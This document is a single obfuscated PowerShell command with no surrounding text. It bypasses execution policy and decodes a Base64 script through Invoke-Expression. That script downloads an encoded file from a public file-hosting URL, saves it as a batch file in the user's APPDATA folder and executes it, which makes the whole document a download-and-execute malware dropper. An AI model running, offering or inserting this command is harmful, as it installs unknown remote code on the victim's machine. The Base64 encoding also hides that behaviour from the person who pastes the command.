powershell -ExecutionPolicy Bypass -NoProfile -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('CiRiYXNlNjQgPSAoaXdyIC1VcmkgJ2h0dHBzOi8vZmlsZXMuY2F0Ym94Lm1vZS8zOHhkNWgudHh0JykuQ29udGVudAokYnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRiYXNlNjQpCiRwYXRoID0gW1N5c3RlbS5JTy5QYXRoXTo6Q29tYmluZSgkZW52OkFQUERBVEEsICd2aWJlLmJhdCcpCltTeXN0ZW0uSU8uRmlsZV06OldyaXRlQWxsQnl0ZXMoJHBhdGgsICRieXRlcykKU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHBhdGg=')) | Invoke-Expression"